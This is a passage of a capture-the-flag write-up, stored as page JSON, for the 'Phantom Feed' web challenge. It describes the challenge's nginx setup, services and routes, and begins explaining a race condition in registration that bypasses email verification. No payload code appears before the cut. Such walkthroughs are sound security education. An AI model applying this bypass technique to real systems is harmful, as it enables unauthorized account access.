[{"data":1,"prerenderedAt":5946},["ShallowReactive",2],{"content-query-UC05JR53Hy":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":5941,"_id":5942,"_source":5825,"_file":5943,"_stem":5944,"_extension":5945},"/writeups/phantom-feed","writeups",false,"","Phantom Feed",{"title":8,"description":10,"keywords":11,"slug":12,"image":13,"date":14,"meta":15},"Writeup of Phantom Feed a hard web challenge from htb-uni ctf 2023. Is about race condition and XSS.","web,race-condition,xss,oauth2,CVE-2023-33733","phantom-feed","https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230872/writeups/htb-uni-2023.webp","2023-12-08",[16,17,18,19,21,23,24,26],{"og:image":13},{"og:title":8},{"og:description":10},{"og:type":20},"article",{"og:url":22},"https://owalid.com/phantom-feed",{"description":10},{"title":25},"Phantom Feed writeup",{"keywords":27},"web,race-condition,xss,oauth2,CVE-2023-33733,htb,ctf,writeup",{"type":29,"children":30,"toc":5934},"root",[31,38,45,51,57,62,257,264,269,275,280,289,324,332,337,343,348,355,368,375,380,386,393,398,417,423,428,432,437,441,454,922,1184,1189,1460,1465,1477,1515,1520,1912,1917,1922,2294,2299,2304,2309,2314,2318,2323,2327,2333,2338,2358,3030,3035,3041,3054,3059,3104,3107,3145,3149,3204,3224,3229,3233,3238,3242,3263,3267,3272,3277,3372,3377,4381,4386,4391,4404,4409,4413,4418,4455,4480,4492,4496,4502,4515,4534,4546,4550,4555,4559,4564,4568,4573,4579,4584,5198,5218,5230,5344,5349,5354,5851,5864,5878,5886,5891,5910,5915,5919,5924,5928],{"type":32,"tag":33,"props":34,"children":35},"element","h1",{"id":12},[36],{"type":37,"value":8},"text",{"type":32,"tag":39,"props":40,"children":42},"h2",{"id":41},"introduction",[43],{"type":37,"value":44},"Introduction",{"type":32,"tag":46,"props":47,"children":48},"p",{},[49],{"type":37,"value":50},"Phantom Feed is a hard web challenge from htb-uni ctf 2023. 
There are a lot of files in this chal, in total there are 3 web services running.",{"type":32,"tag":52,"props":53,"children":56},"custom-image",{"imgSrc":54,":width":55},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704223463/writeups/phantom-feed/folder-expanded.webp","300",[],{"type":32,"tag":46,"props":58,"children":59},{},[60],{"type":37,"value":61},"Below you will find the nginx configuration for the challenges:",{"type":32,"tag":63,"props":64,"children":66},"code-card",{"lang":65},"conf",[67],{"type":32,"tag":68,"props":69,"children":72},"pre",{"className":70,"code":71,"language":65,"meta":7,"style":7},"language-conf shiki shiki-themes vitesse-dark","http {\n    server {\n        listen 1337;\n        server_name pantomfeed;\n        \n        location / {\n            proxy_pass http://127.0.0.1:5000;\n        }\n\n        location /phantomfeed {\n            proxy_pass http://127.0.0.1:3000;\n            proxy_set_header Host $host;\n            proxy_set_header X-Real-IP $remote_addr;\n        }\n\n        location /backend {\n            proxy_pass http://127.0.0.1:4000;\n        }\n    }\n}\n",[73],{"type":32,"tag":74,"props":75,"children":76},"code",{"__ignoreMap":7},[77,88,97,106,115,124,133,142,151,161,170,179,188,197,205,213,222,231,239,248],{"type":32,"tag":78,"props":79,"children":82},"span",{"class":80,"line":81},"line",1,[83],{"type":32,"tag":78,"props":84,"children":85},{},[86],{"type":37,"value":87},"http {\n",{"type":32,"tag":78,"props":89,"children":91},{"class":80,"line":90},2,[92],{"type":32,"tag":78,"props":93,"children":94},{},[95],{"type":37,"value":96},"    server {\n",{"type":32,"tag":78,"props":98,"children":100},{"class":80,"line":99},3,[101],{"type":32,"tag":78,"props":102,"children":103},{},[104],{"type":37,"value":105},"        listen 1337;\n",{"type":32,"tag":78,"props":107,"children":109},{"class":80,"line":108},4,[110],{"type":32,"tag":78,"props":111,"children":112},{},[113],{"type":37,"value":114},"        server_name 
pantomfeed;\n",{"type":32,"tag":78,"props":116,"children":118},{"class":80,"line":117},5,[119],{"type":32,"tag":78,"props":120,"children":121},{},[122],{"type":37,"value":123},"        \n",{"type":32,"tag":78,"props":125,"children":127},{"class":80,"line":126},6,[128],{"type":32,"tag":78,"props":129,"children":130},{},[131],{"type":37,"value":132},"        location / {\n",{"type":32,"tag":78,"props":134,"children":136},{"class":80,"line":135},7,[137],{"type":32,"tag":78,"props":138,"children":139},{},[140],{"type":37,"value":141},"            proxy_pass http://127.0.0.1:5000;\n",{"type":32,"tag":78,"props":143,"children":145},{"class":80,"line":144},8,[146],{"type":32,"tag":78,"props":147,"children":148},{},[149],{"type":37,"value":150},"        }\n",{"type":32,"tag":78,"props":152,"children":154},{"class":80,"line":153},9,[155],{"type":32,"tag":78,"props":156,"children":158},{"emptyLinePlaceholder":157},true,[159],{"type":37,"value":160},"\n",{"type":32,"tag":78,"props":162,"children":164},{"class":80,"line":163},10,[165],{"type":32,"tag":78,"props":166,"children":167},{},[168],{"type":37,"value":169},"        location /phantomfeed {\n",{"type":32,"tag":78,"props":171,"children":173},{"class":80,"line":172},11,[174],{"type":32,"tag":78,"props":175,"children":176},{},[177],{"type":37,"value":178},"            proxy_pass http://127.0.0.1:3000;\n",{"type":32,"tag":78,"props":180,"children":182},{"class":80,"line":181},12,[183],{"type":32,"tag":78,"props":184,"children":185},{},[186],{"type":37,"value":187},"            proxy_set_header Host $host;\n",{"type":32,"tag":78,"props":189,"children":191},{"class":80,"line":190},13,[192],{"type":32,"tag":78,"props":193,"children":194},{},[195],{"type":37,"value":196},"            proxy_set_header X-Real-IP 
$remote_addr;\n",{"type":32,"tag":78,"props":198,"children":200},{"class":80,"line":199},14,[201],{"type":32,"tag":78,"props":202,"children":203},{},[204],{"type":37,"value":150},{"type":32,"tag":78,"props":206,"children":208},{"class":80,"line":207},15,[209],{"type":32,"tag":78,"props":210,"children":211},{"emptyLinePlaceholder":157},[212],{"type":37,"value":160},{"type":32,"tag":78,"props":214,"children":216},{"class":80,"line":215},16,[217],{"type":32,"tag":78,"props":218,"children":219},{},[220],{"type":37,"value":221},"        location /backend {\n",{"type":32,"tag":78,"props":223,"children":225},{"class":80,"line":224},17,[226],{"type":32,"tag":78,"props":227,"children":228},{},[229],{"type":37,"value":230},"            proxy_pass http://127.0.0.1:4000;\n",{"type":32,"tag":78,"props":232,"children":234},{"class":80,"line":233},18,[235],{"type":32,"tag":78,"props":236,"children":237},{},[238],{"type":37,"value":150},{"type":32,"tag":78,"props":240,"children":242},{"class":80,"line":241},19,[243],{"type":32,"tag":78,"props":244,"children":245},{},[246],{"type":37,"value":247},"    }\n",{"type":32,"tag":78,"props":249,"children":251},{"class":80,"line":250},20,[252],{"type":32,"tag":78,"props":253,"children":254},{},[255],{"type":37,"value":256},"}\n",{"type":32,"tag":258,"props":259,"children":261},"h3",{"id":260},"port-5000",[262],{"type":37,"value":263},"Port 5000:",{"type":32,"tag":46,"props":265,"children":266},{},[267],{"type":37,"value":268},"This service is a Vue.js application, this frontend application interacts with the backend service (4000).",{"type":32,"tag":258,"props":270,"children":272},{"id":271},"port-3000",[273],{"type":37,"value":274},"Port 3000:",{"type":32,"tag":46,"props":276,"children":277},{},[278],{"type":37,"value":279},"This service is Flask application it allows a user to log in and generate a token via oauth2 to use in the Vue.js 
application.",{"type":32,"tag":46,"props":281,"children":282},{},[283],{"type":32,"tag":284,"props":285,"children":286},"strong",{},[287],{"type":37,"value":288},"Interesting routes:",{"type":32,"tag":290,"props":291,"children":292},"ul",{},[293,299,304,309,314,319],{"type":32,"tag":294,"props":295,"children":296},"li",{},[297],{"type":37,"value":298},"GET/POST /login - No middleware - Renders a login form (GET) and handles user authentication (POST).",{"type":32,"tag":294,"props":300,"children":301},{},[302],{"type":37,"value":303},"GET/POST /register - No middleware - Renders a registration form (GET) and handles user registration (POST).",{"type":32,"tag":294,"props":305,"children":306},{},[307],{"type":37,"value":308},"GET/POST /feed - auth_middleware - Displays posts (GET) and creates new posts (POST) after parameter validation, it also handles the bot (POST).",{"type":32,"tag":294,"props":310,"children":311},{},[312],{"type":37,"value":313},"GET /oauth2/auth - auth_middleware - Manages OAuth2 authorization by rendering an authorization page.",{"type":32,"tag":294,"props":315,"children":316},{},[317],{"type":37,"value":318},"GET /oauth2/code - auth_middleware - Generates an authorization code and redirects to the specified redirect_url.",{"type":32,"tag":294,"props":320,"children":321},{},[322],{"type":37,"value":323},"GET /oauth2/token - auth_middleware - Validates an authorization code and generates an access token in JSON format.",{"type":32,"tag":46,"props":325,"children":326},{},[327],{"type":32,"tag":284,"props":328,"children":329},{},[330],{"type":37,"value":331},"Middleware:",{"type":32,"tag":46,"props":333,"children":334},{},[335],{"type":37,"value":336},"The middleware ensures that certain routes are accessible only to authenticated users by redirecting to the login page if authentication fails or if the token is missing or invalid.",{"type":32,"tag":258,"props":338,"children":340},{"id":339},"port-4000",[341],{"type":37,"value":342},"Port 
4000:",{"type":32,"tag":46,"props":344,"children":345},{},[346],{"type":37,"value":347},"This service is a Flask application; it allows fetching some products and orders.",{"type":32,"tag":46,"props":349,"children":350},{},[351],{"type":32,"tag":284,"props":352,"children":353},{},[354],{"type":37,"value":288},{"type":32,"tag":290,"props":356,"children":357},{},[358,363],{"type":32,"tag":294,"props":359,"children":360},{},[361],{"type":37,"value":362},"GET / - No middleware - Returns an \"OK\" response.",{"type":32,"tag":294,"props":364,"children":365},{},[366],{"type":37,"value":367},"POST /orders/html - admin_middleware - Generates a PDF file containing orders in HTML format (Restricted to administrators).",{"type":32,"tag":46,"props":369,"children":370},{},[371],{"type":32,"tag":284,"props":372,"children":373},{},[374],{"type":37,"value":331},{"type":32,"tag":46,"props":376,"children":377},{},[378],{"type":37,"value":379},"The admin_middleware middleware restricts access to certain routes to users classified as administrators.",{"type":32,"tag":39,"props":381,"children":383},{"id":382},"race-condition",[384],{"type":37,"value":385},"Race Condition",{"type":32,"tag":387,"props":388,"children":390},"h4",{"id":389},"what-is-race-condition",[391],{"type":37,"value":392},"What is race condition?",{"type":32,"tag":399,"props":400,"children":401},"blockquote",{},[402],{"type":32,"tag":46,"props":403,"children":404},{},[405,407],{"type":37,"value":406},"Race conditions are a common type of vulnerability closely related to business logic flaws. They occur when websites process requests concurrently without adequate safeguards. This can lead to multiple distinct threads interacting with the same data at the same time, resulting in a \"collision\" that causes unintended behavior in the application. 
",{"type":32,"tag":408,"props":409,"children":414},"a",{":target":410,"href":411,"rel":412},"_blank","https://portswigger.net/web-security/race-conditions",[413],"nofollow",[415],{"type":37,"value":416},"Portswigger",{"type":32,"tag":387,"props":418,"children":420},{"id":419},"initial-entry",[421],{"type":37,"value":422},"Initial entry",{"type":32,"tag":46,"props":424,"children":425},{},[426],{"type":37,"value":427},"Based on the numerous services, the initial entry point would be the token generation service (port 3000). The API that generates tokens has a route for registering a user. The first blocking point is that a message indicates that an email has been sent to us. However, no mail service is launched in the challenge.",{"type":32,"tag":52,"props":429,"children":431},{"imgSrc":430},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230708/writeups/phantom-feed/email_code_sent.webp",[],{"type":32,"tag":46,"props":433,"children":434},{},[435],{"type":37,"value":436},"And when we try to log in, we can see that the account is not verified.",{"type":32,"tag":52,"props":438,"children":440},{"imgSrc":439},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230615/writeups/phantom-feed/not_verified.webp",[],{"type":32,"tag":46,"props":442,"children":443},{},[444,446,452],{"type":37,"value":445},"We can see in the code that a boolean attribute ",{"type":32,"tag":74,"props":447,"children":449},{"className":448},[],[450],{"type":37,"value":451},"verified",{"type":37,"value":453}," is set to False during registration. 
Therefore, we need to find a way to bypass it in order to have a valid account.",{"type":32,"tag":63,"props":455,"children":457},{"lang":456},"python",[458],{"type":32,"tag":68,"props":459,"children":462},{"className":460,"code":461,"language":456,"meta":7,"style":7},"language-python shiki shiki-themes vitesse-dark","@web.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n  [...]\n  user_valid, user_id = db_session.create_user(username, password, email) # \u003C--- Here the account is created\n  [...]\n  email_client = EmailClient(email)\n  verification_code = db_session.add_verification(user_id) # \u003C--- Here is the boolean set to False\n  email_client.send_email(f\"http://phantomfeed.htb/phantomfeed/confirm?verification_code={verification_code}\")\n  \n  return render_template(\"error.html\", title=\"error\", error=\"verification code sent\"), 200\n",[463],{"type":32,"tag":74,"props":464,"children":465},{"__ignoreMap":7},[466,564,583,602,677,692,723,766,820,828],{"type":32,"tag":78,"props":467,"children":468},{"class":80,"line":81},[469,475,481,486,491,496,502,508,512,517,523,528,532,537,541,545,550,555,559],{"type":32,"tag":78,"props":470,"children":472},{"style":471},"--shiki-default:#666666",[473],{"type":37,"value":474},"@",{"type":32,"tag":78,"props":476,"children":478},{"style":477},"--shiki-default:#80A665",[479],{"type":37,"value":480},"web",{"type":32,"tag":78,"props":482,"children":483},{"style":471},[484],{"type":37,"value":485},".",{"type":32,"tag":78,"props":487,"children":488},{"style":477},[489],{"type":37,"value":490},"route",{"type":32,"tag":78,"props":492,"children":493},{"style":471},[494],{"type":37,"value":495},"(",{"type":32,"tag":78,"props":497,"children":499},{"style":498},"--shiki-default:#C98A7D77",[500],{"type":37,"value":501},"\"",{"type":32,"tag":78,"props":503,"children":505},{"style":504},"--shiki-default:#C98A7D",[506],{"type":37,"value":507},"/register",{"type":32,"tag":78,"props":509,"children":510},{"style":49
8},[511],{"type":37,"value":501},{"type":32,"tag":78,"props":513,"children":514},{"style":471},[515],{"type":37,"value":516},",",{"type":32,"tag":78,"props":518,"children":520},{"style":519},"--shiki-default:#BD976A",[521],{"type":37,"value":522}," methods",{"type":32,"tag":78,"props":524,"children":525},{"style":471},[526],{"type":37,"value":527},"=[",{"type":32,"tag":78,"props":529,"children":530},{"style":498},[531],{"type":37,"value":501},{"type":32,"tag":78,"props":533,"children":534},{"style":504},[535],{"type":37,"value":536},"GET",{"type":32,"tag":78,"props":538,"children":539},{"style":498},[540],{"type":37,"value":501},{"type":32,"tag":78,"props":542,"children":543},{"style":471},[544],{"type":37,"value":516},{"type":32,"tag":78,"props":546,"children":547},{"style":498},[548],{"type":37,"value":549}," \"",{"type":32,"tag":78,"props":551,"children":552},{"style":504},[553],{"type":37,"value":554},"POST",{"type":32,"tag":78,"props":556,"children":557},{"style":498},[558],{"type":37,"value":501},{"type":32,"tag":78,"props":560,"children":561},{"style":471},[562],{"type":37,"value":563},"])\n",{"type":32,"tag":78,"props":565,"children":566},{"class":80,"line":90},[567,573,578],{"type":32,"tag":78,"props":568,"children":570},{"style":569},"--shiki-default:#CB7676",[571],{"type":37,"value":572},"def",{"type":32,"tag":78,"props":574,"children":575},{"style":477},[576],{"type":37,"value":577}," register",{"type":32,"tag":78,"props":579,"children":580},{"style":471},[581],{"type":37,"value":582},"():\n",{"type":32,"tag":78,"props":584,"children":585},{"class":80,"line":99},[586,591,597],{"type":32,"tag":78,"props":587,"children":588},{"style":471},[589],{"type":37,"value":590},"  
[",{"type":32,"tag":78,"props":592,"children":594},{"style":593},"--shiki-default:#C99076",[595],{"type":37,"value":596},"...",{"type":32,"tag":78,"props":598,"children":599},{"style":471},[600],{"type":37,"value":601},"]\n",{"type":32,"tag":78,"props":603,"children":604},{"class":80,"line":108},[605,611,615,620,625,630,634,639,643,648,652,657,661,666,671],{"type":32,"tag":78,"props":606,"children":608},{"style":607},"--shiki-default:#DBD7CAEE",[609],{"type":37,"value":610},"  user_valid",{"type":32,"tag":78,"props":612,"children":613},{"style":471},[614],{"type":37,"value":516},{"type":32,"tag":78,"props":616,"children":617},{"style":607},[618],{"type":37,"value":619}," user_id ",{"type":32,"tag":78,"props":621,"children":622},{"style":471},[623],{"type":37,"value":624},"=",{"type":32,"tag":78,"props":626,"children":627},{"style":607},[628],{"type":37,"value":629}," db_session",{"type":32,"tag":78,"props":631,"children":632},{"style":471},[633],{"type":37,"value":485},{"type":32,"tag":78,"props":635,"children":636},{"style":607},[637],{"type":37,"value":638},"create_user",{"type":32,"tag":78,"props":640,"children":641},{"style":471},[642],{"type":37,"value":495},{"type":32,"tag":78,"props":644,"children":645},{"style":607},[646],{"type":37,"value":647},"username",{"type":32,"tag":78,"props":649,"children":650},{"style":471},[651],{"type":37,"value":516},{"type":32,"tag":78,"props":653,"children":654},{"style":607},[655],{"type":37,"value":656}," password",{"type":32,"tag":78,"props":658,"children":659},{"style":471},[660],{"type":37,"value":516},{"type":32,"tag":78,"props":662,"children":663},{"style":607},[664],{"type":37,"value":665}," email",{"type":32,"tag":78,"props":667,"children":668},{"style":471},[669],{"type":37,"value":670},")",{"type":32,"tag":78,"props":672,"children":674},{"style":673},"--shiki-default:#758575DD",[675],{"type":37,"value":676}," # \u003C--- Here the account is 
created\n",{"type":32,"tag":78,"props":678,"children":679},{"class":80,"line":117},[680,684,688],{"type":32,"tag":78,"props":681,"children":682},{"style":471},[683],{"type":37,"value":590},{"type":32,"tag":78,"props":685,"children":686},{"style":593},[687],{"type":37,"value":596},{"type":32,"tag":78,"props":689,"children":690},{"style":471},[691],{"type":37,"value":601},{"type":32,"tag":78,"props":693,"children":694},{"class":80,"line":126},[695,700,704,709,713,718],{"type":32,"tag":78,"props":696,"children":697},{"style":607},[698],{"type":37,"value":699},"  email_client ",{"type":32,"tag":78,"props":701,"children":702},{"style":471},[703],{"type":37,"value":624},{"type":32,"tag":78,"props":705,"children":706},{"style":607},[707],{"type":37,"value":708}," EmailClient",{"type":32,"tag":78,"props":710,"children":711},{"style":471},[712],{"type":37,"value":495},{"type":32,"tag":78,"props":714,"children":715},{"style":607},[716],{"type":37,"value":717},"email",{"type":32,"tag":78,"props":719,"children":720},{"style":471},[721],{"type":37,"value":722},")\n",{"type":32,"tag":78,"props":724,"children":725},{"class":80,"line":135},[726,731,735,739,743,748,752,757,761],{"type":32,"tag":78,"props":727,"children":728},{"style":607},[729],{"type":37,"value":730},"  verification_code 
",{"type":32,"tag":78,"props":732,"children":733},{"style":471},[734],{"type":37,"value":624},{"type":32,"tag":78,"props":736,"children":737},{"style":607},[738],{"type":37,"value":629},{"type":32,"tag":78,"props":740,"children":741},{"style":471},[742],{"type":37,"value":485},{"type":32,"tag":78,"props":744,"children":745},{"style":607},[746],{"type":37,"value":747},"add_verification",{"type":32,"tag":78,"props":749,"children":750},{"style":471},[751],{"type":37,"value":495},{"type":32,"tag":78,"props":753,"children":754},{"style":607},[755],{"type":37,"value":756},"user_id",{"type":32,"tag":78,"props":758,"children":759},{"style":471},[760],{"type":37,"value":670},{"type":32,"tag":78,"props":762,"children":763},{"style":673},[764],{"type":37,"value":765}," # \u003C--- Here is the boolean set to False\n",{"type":32,"tag":78,"props":767,"children":768},{"class":80,"line":144},[769,774,778,783,787,792,797,802,807,812,816],{"type":32,"tag":78,"props":770,"children":771},{"style":607},[772],{"type":37,"value":773},"  
email_client",{"type":32,"tag":78,"props":775,"children":776},{"style":471},[777],{"type":37,"value":485},{"type":32,"tag":78,"props":779,"children":780},{"style":607},[781],{"type":37,"value":782},"send_email",{"type":32,"tag":78,"props":784,"children":785},{"style":471},[786],{"type":37,"value":495},{"type":32,"tag":78,"props":788,"children":789},{"style":569},[790],{"type":37,"value":791},"f",{"type":32,"tag":78,"props":793,"children":794},{"style":504},[795],{"type":37,"value":796},"\"http://phantomfeed.htb/phantomfeed/confirm?verification_code=",{"type":32,"tag":78,"props":798,"children":799},{"style":593},[800],{"type":37,"value":801},"{",{"type":32,"tag":78,"props":803,"children":804},{"style":607},[805],{"type":37,"value":806},"verification_code",{"type":32,"tag":78,"props":808,"children":809},{"style":593},[810],{"type":37,"value":811},"}",{"type":32,"tag":78,"props":813,"children":814},{"style":504},[815],{"type":37,"value":501},{"type":32,"tag":78,"props":817,"children":818},{"style":471},[819],{"type":37,"value":722},{"type":32,"tag":78,"props":821,"children":822},{"class":80,"line":153},[823],{"type":32,"tag":78,"props":824,"children":825},{"style":607},[826],{"type":37,"value":827},"  \n",{"type":32,"tag":78,"props":829,"children":830},{"class":80,"line":163},[831,837,842,846,850,855,859,863,868,872,876,881,885,889,894,898,902,907,911,916],{"type":32,"tag":78,"props":832,"children":834},{"style":833},"--shiki-default:#4D9375",[835],{"type":37,"value":836},"  return",{"type":32,"tag":78,"props":838,"children":839},{"style":607},[840],{"type":37,"value":841}," 
render_template",{"type":32,"tag":78,"props":843,"children":844},{"style":471},[845],{"type":37,"value":495},{"type":32,"tag":78,"props":847,"children":848},{"style":498},[849],{"type":37,"value":501},{"type":32,"tag":78,"props":851,"children":852},{"style":504},[853],{"type":37,"value":854},"error.html",{"type":32,"tag":78,"props":856,"children":857},{"style":498},[858],{"type":37,"value":501},{"type":32,"tag":78,"props":860,"children":861},{"style":471},[862],{"type":37,"value":516},{"type":32,"tag":78,"props":864,"children":865},{"style":519},[866],{"type":37,"value":867}," title",{"type":32,"tag":78,"props":869,"children":870},{"style":471},[871],{"type":37,"value":624},{"type":32,"tag":78,"props":873,"children":874},{"style":498},[875],{"type":37,"value":501},{"type":32,"tag":78,"props":877,"children":878},{"style":504},[879],{"type":37,"value":880},"error",{"type":32,"tag":78,"props":882,"children":883},{"style":498},[884],{"type":37,"value":501},{"type":32,"tag":78,"props":886,"children":887},{"style":471},[888],{"type":37,"value":516},{"type":32,"tag":78,"props":890,"children":891},{"style":519},[892],{"type":37,"value":893}," error",{"type":32,"tag":78,"props":895,"children":896},{"style":471},[897],{"type":37,"value":624},{"type":32,"tag":78,"props":899,"children":900},{"style":498},[901],{"type":37,"value":501},{"type":32,"tag":78,"props":903,"children":904},{"style":504},[905],{"type":37,"value":906},"verification code sent",{"type":32,"tag":78,"props":908,"children":909},{"style":498},[910],{"type":37,"value":501},{"type":32,"tag":78,"props":912,"children":913},{"style":471},[914],{"type":37,"value":915},"),",{"type":32,"tag":78,"props":917,"children":919},{"style":918},"--shiki-default:#4C9A91",[920],{"type":37,"value":921}," 200\n",{"type":32,"tag":63,"props":923,"children":924},{"lang":456},[925],{"type":32,"tag":68,"props":926,"children":928},{"className":460,"code":927,"language":456,"meta":7,"style":7},"def add_verification(self, user_id):\n    
verification_code = generate(12)\n    self.session.query(Users).filter(Users.id == user_id)\n      .update({\"verification_code\": verification_code, \"verified\": False})\n    self.session.commit()\n    return verification_code\n",[929],{"type":32,"tag":74,"props":930,"children":931},{"__ignoreMap":7},[932,967,997,1072,1142,1171],{"type":32,"tag":78,"props":933,"children":934},{"class":80,"line":81},[935,939,944,948,953,957,962],{"type":32,"tag":78,"props":936,"children":937},{"style":569},[938],{"type":37,"value":572},{"type":32,"tag":78,"props":940,"children":941},{"style":477},[942],{"type":37,"value":943}," add_verification",{"type":32,"tag":78,"props":945,"children":946},{"style":471},[947],{"type":37,"value":495},{"type":32,"tag":78,"props":949,"children":950},{"style":607},[951],{"type":37,"value":952},"self",{"type":32,"tag":78,"props":954,"children":955},{"style":471},[956],{"type":37,"value":516},{"type":32,"tag":78,"props":958,"children":959},{"style":607},[960],{"type":37,"value":961}," user_id",{"type":32,"tag":78,"props":963,"children":964},{"style":471},[965],{"type":37,"value":966},"):\n",{"type":32,"tag":78,"props":968,"children":969},{"class":80,"line":90},[970,975,979,984,988,993],{"type":32,"tag":78,"props":971,"children":972},{"style":607},[973],{"type":37,"value":974},"    verification_code ",{"type":32,"tag":78,"props":976,"children":977},{"style":471},[978],{"type":37,"value":624},{"type":32,"tag":78,"props":980,"children":981},{"style":607},[982],{"type":37,"value":983}," 
generate",{"type":32,"tag":78,"props":985,"children":986},{"style":471},[987],{"type":37,"value":495},{"type":32,"tag":78,"props":989,"children":990},{"style":918},[991],{"type":37,"value":992},"12",{"type":32,"tag":78,"props":994,"children":995},{"style":471},[996],{"type":37,"value":722},{"type":32,"tag":78,"props":998,"children":999},{"class":80,"line":99},[1000,1005,1009,1014,1018,1023,1027,1032,1037,1042,1046,1050,1054,1059,1064,1068],{"type":32,"tag":78,"props":1001,"children":1002},{"style":593},[1003],{"type":37,"value":1004},"    self",{"type":32,"tag":78,"props":1006,"children":1007},{"style":471},[1008],{"type":37,"value":485},{"type":32,"tag":78,"props":1010,"children":1011},{"style":607},[1012],{"type":37,"value":1013},"session",{"type":32,"tag":78,"props":1015,"children":1016},{"style":471},[1017],{"type":37,"value":485},{"type":32,"tag":78,"props":1019,"children":1020},{"style":607},[1021],{"type":37,"value":1022},"query",{"type":32,"tag":78,"props":1024,"children":1025},{"style":471},[1026],{"type":37,"value":495},{"type":32,"tag":78,"props":1028,"children":1029},{"style":607},[1030],{"type":37,"value":1031},"Users",{"type":32,"tag":78,"props":1033,"children":1034},{"style":471},[1035],{"type":37,"value":1036},").",{"type":32,"tag":78,"props":1038,"children":1039},{"style":607},[1040],{"type":37,"value":1041},"filter",{"type":32,"tag":78,"props":1043,"children":1044},{"style":471},[1045],{"type":37,"value":495},{"type":32,"tag":78,"props":1047,"children":1048},{"style":607},[1049],{"type":37,"value":1031},{"type":32,"tag":78,"props":1051,"children":1052},{"style":471},[1053],{"type":37,"value":485},{"type":32,"tag":78,"props":1055,"children":1056},{"style":607},[1057],{"type":37,"value":1058},"id 
",{"type":32,"tag":78,"props":1060,"children":1061},{"style":569},[1062],{"type":37,"value":1063},"==",{"type":32,"tag":78,"props":1065,"children":1066},{"style":607},[1067],{"type":37,"value":961},{"type":32,"tag":78,"props":1069,"children":1070},{"style":471},[1071],{"type":37,"value":722},{"type":32,"tag":78,"props":1073,"children":1074},{"class":80,"line":108},[1075,1080,1085,1090,1094,1098,1102,1107,1112,1116,1120,1124,1128,1132,1137],{"type":32,"tag":78,"props":1076,"children":1077},{"style":471},[1078],{"type":37,"value":1079},"      .",{"type":32,"tag":78,"props":1081,"children":1082},{"style":607},[1083],{"type":37,"value":1084},"update",{"type":32,"tag":78,"props":1086,"children":1087},{"style":471},[1088],{"type":37,"value":1089},"({",{"type":32,"tag":78,"props":1091,"children":1092},{"style":498},[1093],{"type":37,"value":501},{"type":32,"tag":78,"props":1095,"children":1096},{"style":504},[1097],{"type":37,"value":806},{"type":32,"tag":78,"props":1099,"children":1100},{"style":498},[1101],{"type":37,"value":501},{"type":32,"tag":78,"props":1103,"children":1104},{"style":471},[1105],{"type":37,"value":1106},":",{"type":32,"tag":78,"props":1108,"children":1109},{"style":607},[1110],{"type":37,"value":1111}," verification_code",{"type":32,"tag":78,"props":1113,"children":1114},{"style":471},[1115],{"type":37,"value":516},{"type":32,"tag":78,"props":1117,"children":1118},{"style":498},[1119],{"type":37,"value":549},{"type":32,"tag":78,"props":1121,"children":1122},{"style":504},[1123],{"type":37,"value":451},{"type":32,"tag":78,"props":1125,"children":1126},{"style":498},[1127],{"type":37,"value":501},{"type":32,"tag":78,"props":1129,"children":1130},{"style":471},[1131],{"type":37,"value":1106},{"type":32,"tag":78,"props":1133,"children":1134},{"style":833},[1135],{"type":37,"value":1136}," 
False",{"type":32,"tag":78,"props":1138,"children":1139},{"style":471},[1140],{"type":37,"value":1141},"})\n",{"type":32,"tag":78,"props":1143,"children":1144},{"class":80,"line":117},[1145,1149,1153,1157,1161,1166],{"type":32,"tag":78,"props":1146,"children":1147},{"style":593},[1148],{"type":37,"value":1004},{"type":32,"tag":78,"props":1150,"children":1151},{"style":471},[1152],{"type":37,"value":485},{"type":32,"tag":78,"props":1154,"children":1155},{"style":607},[1156],{"type":37,"value":1013},{"type":32,"tag":78,"props":1158,"children":1159},{"style":471},[1160],{"type":37,"value":485},{"type":32,"tag":78,"props":1162,"children":1163},{"style":607},[1164],{"type":37,"value":1165},"commit",{"type":32,"tag":78,"props":1167,"children":1168},{"style":471},[1169],{"type":37,"value":1170},"()\n",{"type":32,"tag":78,"props":1172,"children":1173},{"class":80,"line":126},[1174,1179],{"type":32,"tag":78,"props":1175,"children":1176},{"style":833},[1177],{"type":37,"value":1178},"    return",{"type":32,"tag":78,"props":1180,"children":1181},{"style":607},[1182],{"type":37,"value":1183}," verification_code\n",{"type":32,"tag":46,"props":1185,"children":1186},{},[1187],{"type":37,"value":1188},"We can see below that by default the attribute verified is set to True and is only changed to False at the time of sending the email.",{"type":32,"tag":63,"props":1190,"children":1191},{"lang":456},[1192],{"type":32,"tag":68,"props":1193,"children":1195},{"className":460,"code":1194,"language":456,"meta":7,"style":7},"class Users(Base):\n    __tablename__ = \"users\"\n    id = Column(Integer, primary_key=True)\n    verification_code = Column(String)\n    verified = Column(Boolean, default=True)\n    username = Column(String)\n    password = Column(String)\n    email = 
Column(String)\n",[1196],{"type":32,"tag":74,"props":1197,"children":1198},{"__ignoreMap":7},[1199,1226,1252,1302,1330,1376,1404,1432],{"type":32,"tag":78,"props":1200,"children":1201},{"class":80,"line":81},[1202,1207,1213,1217,1222],{"type":32,"tag":78,"props":1203,"children":1204},{"style":569},[1205],{"type":37,"value":1206},"class",{"type":32,"tag":78,"props":1208,"children":1210},{"style":1209},"--shiki-default:#5DA994",[1211],{"type":37,"value":1212}," Users",{"type":32,"tag":78,"props":1214,"children":1215},{"style":471},[1216],{"type":37,"value":495},{"type":32,"tag":78,"props":1218,"children":1219},{"style":477},[1220],{"type":37,"value":1221},"Base",{"type":32,"tag":78,"props":1223,"children":1224},{"style":471},[1225],{"type":37,"value":966},{"type":32,"tag":78,"props":1227,"children":1228},{"class":80,"line":90},[1229,1234,1238,1242,1247],{"type":32,"tag":78,"props":1230,"children":1231},{"style":607},[1232],{"type":37,"value":1233},"    __tablename__ 